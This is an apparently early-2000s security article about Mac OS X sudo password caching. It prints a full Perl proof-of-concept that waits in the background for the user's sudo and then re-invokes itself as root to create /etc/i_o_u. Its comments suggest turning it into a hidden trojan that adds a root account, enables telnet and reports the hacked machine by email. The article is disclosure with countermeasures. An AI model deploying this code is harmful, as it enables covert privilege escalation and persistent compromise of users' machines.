Mac OS X Trojans and Security Threats
Mac OS X is UNIX at the core this is very true as described in Apple’s print advertisement, besides sending all others to /dev/null this OS is also open to all the security issues behind the UNIX environment.
Many features that are offered in the UNIX enviornment can lead to security concerns. They’re not to be considered bugs or exploits, just features. Recently Max Grosse shared with SecureMac.com how a feature in sudo could be used to the advantage of hackers to create backdoors or execute malicius code.
The code Max created below would only poses a threat when the person with admin privledges runs it, his example only demonstrates the power – it does not actually backdoor the computer or install a trojan. He was thinking about how a trojan could be implemented best under Mac OS X as a real threat by gaining root privledges. sudo logs all call to /var/log/system.log, one feature of sudo is that it caches the password for 5 minutes.
What is sudo?
Sudo (superuser do) is a piece of software that allows a system admin to give certain users/groups the ability to run commands as root or another user
Sudo is available with most all unix based operating systems including Mac OS X.
By caching the passwords for 5 minutes that user can execute other sudo commands for up to 5 minutes without re-entering the password. When Max’s script is run by the user who has permission to sudo it secretly is running in the background waiting for the user to have admin sudo privileges. It looks at the /var/log/system.log to see when the user is privileged enough, once it is the example script creates a file in /etc called i_o_u owned by root.
[localhost:/etc] test% ls -a -ll |grep i_o_u
———- 1 root wheel 0 Apr 16 12:44 i_o_u
Shown above is the permissions granted to the file i_o_u – root
Readers – Use your imagination, a trojan could be written to do anything you could think of! So many Mac OS X users are using the admin account for everyday use. Do not become a victim to this type of attack. A trojan could be written to make a copy of sh and move it to /etc with permissions to drop the user into a root shell within seconds.
#!/usr/bin/perl
#
# this little script shows kind of a ‘vulnerability’ under MacOS X and
# probably on most other systems that support the ‘sudo’ command
#
# NOTE: this is NOT a bug in sudo! just a misconfiguration resp. a
# “too-insecure”-configuration! but (at least under MacOS X)
its the
# default-configuration!
#
# all it does is sitting and waiting, watching the /var/log/system.log
# file. as soon as it notices the user did a sudo, it also executes a
# sudo w/o needing a password (in default configuration you may sudo
# after successfully entering a password for about 5 minutes w/o having
to
# re-enter it…)
#
# POSSIBLE ABUSE:
# build a trojan. just add this script somewhere and let it run hidden.
# if the victim uses sudo, you own him
#
# TRACEBILITY:
# poor.
#
# COUNTERMEISURES: (everyone should do that!)
# 1) increase the security of your /etc/sudoers file, e.g.
# add the line “Defaults timestamp_timeout=0” before the
line
# containing “# User privilege …”
# 2) OR do not use sudo
#
#
# (c)2002 zwoelf11
# date is Tue Apr 16 18:39:49 CEST 2002
# about this script:
# it will create a file /etc/i_o_u which is owned by root and has no
permissions
# to test it (macosx or similar):
# 1) run it with
# perl /path/to/sudohack.pl
# 2) on another terminal-window/console type
# sudo echo “hi”
# 3) enter your password ON THAT window
# (if it asks you on the window you run sudohack.pl on,
# your system is not “vulnerable”)
# 4) wait a bit (max 10 secs)
# 5) check for a file /etc/i_o_u
# why this is not-so-dangerous:
# 1) you have to get this script run on the victim’s machine
# (and its not that easy as it sounds)
# 2) the victim has to have “sudo”-privileges
# 3) the victim has to use (someday) sudo
# alltogether not so certain =)
#
# BUT: if you MacOS X newbies keep sudo-ing everything because
# you cannot stand that some thigns should not be changed, BE PREPARED
:o)
$whoami = `whoami`; $whoami=~ s/\n//g;
print “$whoami”;
if($whoami eq “root”) {
goto ROOT;
}
print “Sudohack running…\n”;
while(1) {
print “.”;
$lastsudo = “”;
open(TAIL, “tail /var/log/system.log |”);
while(defined($line = <TAIL>)) {
$_ = $line;
if( /.+ .+ (.+) .+ sudo:[ \t]+(.+) : .+/ ) {
if($2 eq $whoami) {
$lastsudo = $1;
}
}
}
if($lastsudo == “”) {
print “no recent sudo…\n”;
} else {
$timenow=`date “+%H:%M:%S”`; $timenow=~ s/\n//g;
$lastsudo =~ s/://g;
$timenow =~ s/://g;
$ago = $timenow – $lastsudo;
print “last sudo was $ago … “;
if($ago > 400) {
print “too long :(\n”;
$ok = 0
} else {
print “okay!!!\n”;
$ok = 1;
}
}
if($ok == 1) {
goto DONEIT;
}
sleep 10;
}
DONEIT:
print “*** fucking around abit! ***\n”;
`sudo perl $0`;
exit;
ROOT:
# we are running as root now!
`touch /etc/i_o_u`;
`chown root:wheel /etc/i_o_u`;
`chmod 0 /etc/i_o_u`;
# things to do: (depending on your criminal energy)
# + create yourself a (root) account
# + enable remote telnet (for macosx, if not already)
# + email to some yahoo/hotmail address, that this box has been
# hacked, including the ip, maybe
Protect Yourself
Administrators, do not go running programs in the other users directories. As a example I asked my pal James to to type ‘perl /Users/securemac/s’ and the program executed for him, he didn’t think twice to view the code of the perl script. Lucky this was just a concept perl script which did not actually do anything harmful or backdoor the Mac OS X system. Other ‘administrators’ like to browse their users directories and run programs just because its the admin type thing to do!
Be cautious of the files you run, and do not run files when you are administrator or use sudo. btw james, remove the file i_o_u from /etc – and thanks 😉 Share with us your techniques used to keep your computer secure, keep in mind Mac OS X is used for more than a single user environment and supports multiple users to be logged in at the same time. Of course you can disallow users from even being able to access your computer, I’d like to see how users would prevent or protect themselves from this.